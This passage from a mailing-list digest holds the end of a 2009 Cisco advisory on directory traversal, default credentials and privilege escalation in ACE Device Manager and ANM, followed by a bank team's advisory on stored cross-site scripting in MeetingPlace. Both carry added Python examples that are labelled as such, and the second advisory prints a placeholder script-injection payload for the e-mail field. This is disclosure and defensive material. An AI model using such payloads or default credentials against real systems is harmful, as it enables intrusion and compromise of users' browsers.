http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml.
Note: This advisory is being released simultaneously with a multiple
vulnerabilities advisory impacting the ACE appliance and module
software, which is posted at
http://www.cisco.com/warp/public/707/cisco-sa-20090225-ace.shtml.
Affected Products
=================
Vulnerable Products
-------------------
The following are the products and versions affected by each
vulnerability described within this advisory.
+---------------------------------------+
| Vulnerability | Product | Version |
| | Affected | Affected |
|---------------+----------+------------|
| Invalid | ACE | All |
| Directory | Device | versions |
| Permissions | Manager | prior to |
| | | A3(2.1) |
|---------------+----------+------------|
| Invalid | | All |
| Directory | ANM | versions |
| Permissions | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| Default User | ANM | versions |
| Credentials | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| MySQL Default | ANM | versions |
| Credentials | | prior to |
| | | ANM 2.0 |
|---------------+----------+------------|
| | | All |
| Java Agent | | versions |
| Privilege | ANM | prior to |
| Escalation | | ANM 2.0 |
| | | Update A |
+---------------------------------------+
Determining ACE Device Manager Software Version
+----------------------------------------------
The ACE Device Manager is embedded with the ACE appliance software.
To display the version of system software that is currently running
on the device, use the "show version" command. The following example
includes the output of the "show version" command on a Cisco ACE
appliance running software version A3(2.1):
ACE-4710/Admin# show version
Cisco Application Control Software (ACSW)
TAC support: http://www.cisco.com/tac
Copyright (c) 1985-2008 by Cisco Systems, Inc. All rights reserved.
The copyrights to certain works contained herein are owned by
other third parties and are used and distributed under license.
Some parts of this software are covered under the GNU Public
License. A copy of the license is available at
http://www.gnu.org/licenses/gpl.html.
Software
loader: Version 0.95
system: Version A3(2.1) [build 3.0(0)A3(2.1) adbuild_14:33:29-2008/11/19_/auto/adbu-rel4/rel_a3_2_1_throttle_build/REL_3_0_0_A3_2_1]
system image file: (nd)/192.168.65.32/scimitar.bin
Device Manager version 1.1 (0) 20081113:2052
---
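As an added example, not Cisco code, the following Python extracts the running release from "show version" output and tests it against the ACE 4710 first-fixed releases published in this advisory and its companion ACE advisory; the sample outputs are constructed, and the ordering of release names (A1(8) taken to equal A1(8.0), with a rebuild letter such as A1(8a) sorting after it) is an assumption the advisory does not state.

```python
"""Check an ACE 4710 appliance's "show version" output against the first
fixed releases published for it. Added example, not Cisco code: the sample
outputs are constructed, and the ordering of release names is an assumption
(A1(8) is taken to equal A1(8.0), and a rebuild letter such as A1(8a) to
sort after it)."""
import re

# First Fixed Release for the ACE 4710 appliance, from the tables in
# cisco-sa-20090225-ace and cisco-sa-20090225-anm.
FIRST_FIXED_ACE4710 = {
    "Default Usernames and Passwords": "A1(8a)",
    "Privilege Escalation": "A1(8a)",
    "Crafted SSH Packet": "A3(2.1)",
    "Crafted SNMPv2c Packet": "A3(2.1)",
    "Crafted SNMPv3 Packet": "A1(8.0)",
    "Device Manager Invalid Directory Permissions": "A3(2.1)",
}

# A<major>(<minor>[.<patch>][<letter>]), e.g. A3(2.1), A2(1.3), A1(8a)
_VERSION_RE = re.compile(r"A(\d+)\((\d+)(?:\.(\d+))?([a-z]?)\)")


def parse_version(text):
    """Return (major, minor, patch, letter) for the first release name in
    text, or None if there is none. Tuples compare in release order under
    the assumption stated above."""
    m = _VERSION_RE.search(text)
    if m is None:
        return None
    major, minor, patch, letter = m.groups()
    return (int(major), int(minor), int(patch or 0), letter)


def running_version(show_version_output):
    """Pick the 'system:' line of 'show version' and parse its release."""
    for line in show_version_output.splitlines():
        if line.strip().startswith("system:"):
            return parse_version(line)
    return None


def exposed_to(show_version_output, table=FIRST_FIXED_ACE4710):
    """Names of the vulnerabilities the running release is known to have,
    using the advisory's rule: earlier than First Fixed means vulnerable."""
    running = running_version(show_version_output)
    if running is None:
        raise ValueError("no 'system:' version line in show version output")
    return sorted(name for name, fixed in table.items()
                  if running < parse_version(fixed))


# Constructed sample, modelled on the advisory's "show version" excerpt.
SAMPLE_A3_2_1 = """\
Cisco Application Control Software (ACSW)
Software
  loader:    Version 0.95
  system:    Version A3(2.1) [build 3.0(0)A3(2.1)]
Device Manager version 1.1 (0) 20081113:2052
"""
# The same appliance on the older A1(8a) release (constructed).
SAMPLE_A1_8A = SAMPLE_A3_2_1.replace("A3(2.1)", "A1(8a)")

if __name__ == "__main__":
    for out in (SAMPLE_A3_2_1, SAMPLE_A1_8A):
        print(running_version(out), "->", exposed_to(out) or "no listed vulnerability")
```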
Determining ANM Software Version
+-------------------------------
To display the version of ANM software that is currently installed,
log in to the ANM server and select "About" in the upper right. An
informational pop-up window is displayed. ANM Version 2.0 Update A is
indicated in the example output below.
Version: 2.0(0), Update: A
Build Number: 709
Build Timestamp: 20081031:1226
Products Confirmed Not Vulnerable
---------------------------------
The Cisco ACE XML Gateway, Cisco ACE GSS (Global Site Selector) 4400
Series and Cisco ACE Web Application Firewall are not affected by any of
these vulnerabilities.
No other Cisco products are currently known to be affected by these
vulnerabilities.
Details
=======
ANM is a network management application that manages Cisco ACE modules
or appliances. ANM is installed on customer provided servers with a Red
Hat Enterprise Linux operating system. The ACE Device Manager provides
a browser-based interface for configuring and managing a single ACE
appliance. The ACE Device Manager resides in flash memory on the ACE
appliance. Multiple vulnerabilities exist in ANM and one in the ACE
Device Manager products. The following details are provided for each
vulnerability addressed in this security advisory.
Invalid Directory Permissions
+----------------------------
Versions of the Cisco ACE Device Manager prior to software version
A3(2.1) and Cisco ANM prior to software version ANM 2.0 contain directory
traversal vulnerabilities. These vulnerabilities could allow
unauthorized access to ACE operating system and host operating system
files. To exploit these vulnerabilities authentication is required to
initially access either product.
This vulnerability is documented in the following Cisco Bug IDs:
* CSCsv66063
* CSCsv70130
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0615.
Default User Credentials
+-----------------------
Versions of Cisco ANM prior to software version ANM 2.0 do not force
credential changes during installation. If these credentials are left
unchanged, this could allow unauthorized access to the ANM
application with default user credentials.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu52724
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0616.
MySQL Default Credentials
+------------------------
ANM versions prior to ANM 2.0 use a default MySQL root user password
during installation. The MySQL database is installed by default when
ANM is initially installed. This vulnerability can be exploited
remotely with default credential authentication and without end-user
interaction. Unauthorized access to the database may allow
modification of system files that could impact the function of ANM or
allow execution of commands on the underlying host operating system.
The ACE appliance and module device configuration files in the MySQL
database are encrypted.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu52632
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0617.
Java Agent Privilege Escalation
+------------------------------
ANM versions prior to ANM 2.0 Update A contain a remotely exploitable
vulnerability that could allow an attacker to view configuration
files and modify ANM processes including the capability to stop
services. Exploitation of this issue could result in system
information disclosure or denial of services.
This vulnerability is documented in the following Cisco Bug ID:
* CSCsu73001
This vulnerability has been assigned the Common Vulnerability and
Exposures (CVE) ID CVE-2009-0618.
Vulnerability Scoring Details
+----------------------------
Cisco has provided scores for the vulnerabilities in this advisory
based on the Common Vulnerability Scoring System (CVSS). The CVSS
scoring in this Security Advisory is done in accordance with CVSS
version 2.0.
CVSS is a standards-based scoring method that conveys vulnerability
severity and helps determine urgency and priority of response.
Cisco has provided a base and temporal score. Customers can then
compute environmental scores to assist in determining the impact of
the vulnerability in individual networks.
Cisco has provided an FAQ to answer additional questions regarding
CVSS at:
http://www.cisco.com/web/about/security/intelligence/cvss-qandas.html
Cisco has also provided a CVSS calculator to help compute the
environmental impact for individual networks at:
http://intellishield.cisco.com/security/alertmanager/cvss
* ACE Device Manager invalid directory permissions (CSCsv66063)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM invalid directory permissions (CSCsv70130)
CVSS Base Score - 9.0
Access Vector - Network
Access Complexity - Low
Authentication - Single
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - Functional
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM default user credentials during installation (CSCsu52724)
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM embedded MySQL default credentials (CSCsu52632)
CVSS Base Score - 10.0
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Complete
Integrity Impact - Complete
Availability Impact - Complete
CVSS Temporal Score - 8.7
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
* ANM Java agent privilege escalation (CSCsu73001)
CVSS Base Score - 8.5
Access Vector - Network
Access Complexity - Low
Authentication - None
Confidentiality Impact - Partial
Integrity Impact - None
Availability Impact - Complete
CVSS Temporal Score - 7.4
Exploitability - High
Remediation Level - Official-Fix
Report Confidence - Confirmed
Impact
======
Successful exploitation of the ACE Device Manager and ANM invalid
directory permission vulnerabilities may allow unauthorized access to
view or modify the ACE Device Manager or ANM file system, including host
operating system files. Modification of some system files could result
in a denial of service condition.
Exploitation of the ANM default user credential and ANM MySQL database
default credential vulnerabilities may allow an attacker to gain
unauthorized system access. Modification of ANM settings with the
default user credentials could result in a denial of service condition.
Unauthorized access to the MySQL database may allow modification of
system files that could impact the function of ANM or allow execution of
commands on the underlying host operating system.
Successful exploitation of the ANM privilege escalation vulnerability
may result in unauthorized remote access to system processes and
services, including the ability to modify them. Modification of these
services could result in a denial of service condition.
Software Versions and Fixes
===========================
When considering software upgrades, also consult
http://www.cisco.com/go/psirt and any subsequent advisories to determine
exposure and a complete upgrade solution.
In all cases, customers should exercise caution to be certain the
devices to be upgraded contain sufficient memory and that current
hardware and software configurations will continue to be supported
properly by the new release. If the information is not clear, contact
the Cisco Technical Assistance Center (TAC) or your contracted
maintenance provider for assistance.
Each row of the following software table identifies, in the "First
Fixed Release" column, the earliest possible software release that
contains the fix. The "Recommended Release" column indicates the
release that has fixes for all the published vulnerabilities at the
time of this Advisory.
+---------------------------------------+
| | First | Recommended |
| Vulnerability | Fixed | Release |
| | Release | |
|---------------+---------+-------------|
| ACE Device | | |
| Manager | | |
| Invalid | A3(2.1) | A3(2.1) |
| Directory | | |
| Permissions | | |
|---------------+---------+-------------|
| ANM Invalid | | ANM 2.0 |
| Directory | ANM 2.0 | Update A |
| Permissions | | |
|---------------+---------+-------------|
| ANM Default | | ANM 2.0 |
| User | ANM 2.0 | Update A |
| Credentials | | |
|---------------+---------+-------------|
| ANM MySQL | | ANM 2.0 |
| Default | ANM 2.0 | Update A |
| Credentials | | |
|---------------+---------+-------------|
| ANM Java | ANM 2.0 | |
| Agent | Update | ANM 2.0 |
| Privilege | A | Update A |
| Escalation | | |
+---------------------------------------+
ANM 2.0 Update A can be downloaded from:
http://www.cisco.com/cgi-bin/Software/Tablebuild/doftp.pl?ftpfile=/cisco/crypto/3DES/netmgmt/anm/1.2/anm2.0-update-A.bin
ACE Device Manager A3(2.1) can be downloaded from:
http://www.cisco.com/cgi-bin/Software/Tablebuild/doftp.pl?ftpfile=/cisco/crypto/3DES/ans/DNSS/ace4710/c4710ace-mz.A3_2_1.bin
Workarounds
===========
While this Security Advisory describes multiple distinct
vulnerabilities, a workaround exists for only the following
vulnerability.
ANM Default User Credentials
+---------------------------
The ANM user "admin" account password may be modified after installation
by following the procedures documented for "Changing the Admin Password"
located in the ANM User Guide at:
http://www.cisco.com/en/US/docs/net_mgmt/application_networking_manager/2.0/user/guide/UG_admin.html#wp1053216
Applied Mitigation Bulletin
+--------------------------
Additional mitigation techniques that can be deployed on Cisco devices
within the network are available in the Cisco Applied Mitigation
Bulletin companion document for this advisory:
http://www.cisco.com/warp/public/707/cisco-amb-20090225-anm.shtml
Obtaining Fixed Software
========================
Cisco has released free software updates that address these
vulnerabilities. Prior to deploying software, customers should consult
their maintenance provider or check the software for feature set
compatibility and known issues specific to their environment.
Customers may only install and expect support for the feature
sets they have purchased. By installing, downloading, accessing
or otherwise using such software upgrades, customers agree to be
bound by the terms of Cisco's software license terms found at
http://www.cisco.com/en/US/products/prod_warranties_item09186a008088e31f.html,
or as otherwise set forth at Cisco.com Downloads at
http://www.cisco.com/public/sw-center/sw-usingswc.shtml.
Do not contact psirt@cisco.com or security-alert@cisco.com for software
upgrades.
Customers with Service Contracts
--------------------------------
Customers with contracts should obtain upgraded software through their
regular update channels. For most customers, this means that upgrades
should be obtained through the Software Center on Cisco's worldwide
website at http://www.cisco.com.
Customers using Third Party Support Organizations
-------------------------------------------------
Customers whose Cisco products are provided or maintained through prior
or existing agreements with third-party support organizations, such
as Cisco Partners, authorized resellers, or service providers should
contact that support organization for guidance and assistance with the
appropriate course of action in regards to this advisory.
The effectiveness of any workaround or fix is dependent on specific
customer situations, such as product mix, network topology, traffic
behavior, and organizational mission. Due to the variety of affected
products and releases, customers should consult with their service
provider or support organization to ensure any applied workaround or fix
is the most appropriate for use in the intended network before it is
deployed.
Customers without Service Contracts
-----------------------------------
Customers who purchase direct from Cisco but do not hold a Cisco service
contract, and customers who purchase through third-party vendors but are
unsuccessful in obtaining fixed software through their point of sale
should acquire upgrades by contacting the Cisco Technical Assistance
Center (TAC). TAC contacts are as follows.
* +1 800 553 2447 (toll free from within North America)
* +1 408 526 7209 (toll call from anywhere in the world)
* e-mail: tac@cisco.com
Customers should have their product serial number available and be
prepared to give the URL of this notice as evidence of entitlement to a
free upgrade. Free upgrades for non-contract customers must be requested
through the TAC.
Refer to
http://www.cisco.com/en/US/support/tsd_cisco_worldwide_contacts.html
for additional TAC contact information, including localized telephone
numbers, and instructions and e-mail addresses for use in various
languages.
Exploitation and Public Announcements
=====================================
The Cisco PSIRT is not aware of any public announcements or malicious
use of the vulnerabilities described in this advisory.
Acknowledgement to the National Australia Bank's Security Assurance team
for the discovery and reporting of the ACE Device Manager directory
permissions vulnerability.
The remaining vulnerabilities were identified through internal testing.
Status of this Notice: FINAL
============================
THIS DOCUMENT IS PROVIDED ON AN "AS IS" BASIS AND DOES NOT IMPLY
ANY KIND OF GUARANTEE OR WARRANTY, INCLUDING THE WARRANTIES OF
MERCHANTABILITY OR FITNESS FOR A PARTICULAR USE. YOUR USE OF THE
INFORMATION ON THE DOCUMENT OR MATERIALS LINKED FROM THE DOCUMENT IS
AT YOUR OWN RISK. CISCO RESERVES THE RIGHT TO CHANGE OR UPDATE THIS
DOCUMENT AT ANY TIME.
A stand-alone copy or paraphrase of the text of this document that omits
the distribution URL in the following section is an uncontrolled copy,
and may lack important information or contain factual errors.
Distribution
============
This advisory is posted on Cisco's worldwide website at:
http://www.cisco.com/warp/public/707/cisco-sa-20090225-anm.shtml
In addition to worldwide web posting, a text version of this notice is
clear-signed with the Cisco PSIRT PGP key and is posted to the following
e-mail and Usenet news recipients.
* cust-security-announce@cisco.com
* first-bulletins@lists.first.org
* bugtraq@securityfocus.com
* vulnwatch@vulnwatch.org
* cisco@spot.colorado.edu
* cisco-nsp@puck.nether.net
* full-disclosure@lists.grok.org.uk
* comp.dcom.sys.cisco@newsgate.cisco.com
Future updates of this advisory, if any, will be placed on Cisco's
worldwide website, but may or may not be actively announced on mailing
lists or newsgroups. Users concerned about this problem are encouraged
to check the above URL for any updates.
Revision History
================
+------------------------------------------------------------+
| Revision 1.0 | 2009 February 25 | Initial public release |
+------------------------------------------------------------+
Cisco Security Procedures
=========================
Complete information on reporting security vulnerabilities in
Cisco products, obtaining assistance with security incidents, and
registering to receive security information from Cisco, is available
on Cisco's worldwide website at
http://www.cisco.com/en/US/products/products_security_vulnerability_policy.html.
This includes instructions for press inquiries regarding Cisco security
notices. All Cisco security advisories are available at
http://www.cisco.com/go/psirt.
+--------------------------------------------------------------------
Copyright 2008 - 2009 Cisco Systems, Inc. All rights reserved.
+--------------------------------------------------------------------
Updated: Feb 25, 2009 Document ID: 109451
--- End Message ---
--- Begin Message ---
Title: Cisco Unified MeetingPlace Web Conferencing Stored Cross Site Scripting Vulnerability
CVE Identifier: N/A
____________
Credit:
Security Assurance Team of the National Australia Bank.
The vendor was advised of this vulnerability prior to its public release. National Australia Bank adheres to the "Guidelines for Security Vulnerability Reporting and Response V2.0" document when issuing Security Advisories.
Class: Stored Cross Site Scripting
____________
Remote: Yes
____________
Local: No
____________
Vulnerable:
Cisco Unified Meeting Place 6.0 and possibly 7.0; other versions may also be vulnerable.
____________
Not Vulnerable:
____________
Vendor: Cisco
____________
Discussion:
Cisco Unified Meeting Place is a suite of products used for remote voice, video and web conferencing. The Cisco Unified Meeting Place web interface allows users to schedule and attend conferences.
Each user has the ability to modify their own account settings such as their name, telephone extension, email address etc. National Australia Bank's Security Assurance Team have identified a stored cross site scripting vulnerability that could be exploited by a malicious user to execute code within another user's browser when they view a meeting created by the malicious user.
____________
Exploit:
The "E-mail Address" field of this profile page is vulnerable to stored cross site scripting attacks.
If a user enters the following in the email field, the code within the script tags will be executed whenever that user's profile data is viewed by other users, including when viewing the details of a meeting created by this user:
"><script>INSERT JAVASCRIPT HERE</script>
Solution:
No workaround available.
This vulnerability is fixed in Cisco Unified MeetingPlace Web Conferencing software version 6.0(517.0) also known as Maintenance Release 4 (MR4) for the 6.0 release, and version 7.0(2) also known as Maintenance Release 1 (MR1) for the 7.0 release.
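The defect class this advisory describes (a stored profile field rendered into another user's page without output encoding), shown as an added Python illustration that is not part of the advisory or of MeetingPlace: the vulnerable rendering beside the hardened one, plus a hypothetical write-time address check. The function names, the address rule and the sample profile are assumptions.

```python
import html
import re

# Constructed sample: the payload shape quoted in the advisory, saved into a
# profile field and later rendered into a meeting-details page.
STORED_PAYLOAD = '"><script>INSERT JAVASCRIPT HERE</script>'

# Hypothetical, deliberately conservative address syntax (not MeetingPlace's
# own rule): quotes, angle brackets and whitespace cannot pass.
EMAIL_RE = re.compile(r"[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(?:\.[A-Za-z0-9-]+)+")


def validate_email(value: str) -> bool:
    """Input-side control: reject anything that cannot be an e-mail address."""
    return len(value) <= 254 and EMAIL_RE.fullmatch(value) is not None


def update_profile_email(profile: dict, new_email: str) -> bool:
    """Validate on write, so an HTML fragment is never persisted as an address."""
    if not validate_email(new_email):
        return False
    profile["email"] = new_email
    return True


def render_organizer_unsafe(display_name: str, email: str) -> str:
    """Vulnerable pattern: stored profile data concatenated straight into HTML.
    The leading '">' of the stored value closes the href attribute and the
    <a> tag, and the remainder becomes live markup in the viewer's browser."""
    return f'<p>Organizer: <a href="mailto:{email}">{display_name}</a></p>'


def render_organizer_safe(display_name: str, email: str) -> str:
    """Hardened pattern: every untrusted value is HTML-escaped for its context
    (quote=True also neutralises the attribute-closing double quote)."""
    return (f'<p>Organizer: <a href="mailto:{html.escape(email, quote=True)}">'
            f'{html.escape(display_name)}</a></p>')


def has_script_tag(fragment: str) -> bool:
    """Detection helper for tests or page review: is a real <script> tag present?"""
    return "<script" in fragment.lower()


if __name__ == "__main__":
    profile = {"email": "mallory@example.com"}   # constructed sample profile
    print("accepted as address:", update_profile_email(profile, STORED_PAYLOAD))
    print("unsafe:", render_organizer_unsafe("Mallory", STORED_PAYLOAD))
    print("safe:  ", render_organizer_safe("Mallory", STORED_PAYLOAD))
```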
____________
References:
Vendor Homepage:
http://www.cisco.com
--- End Message ---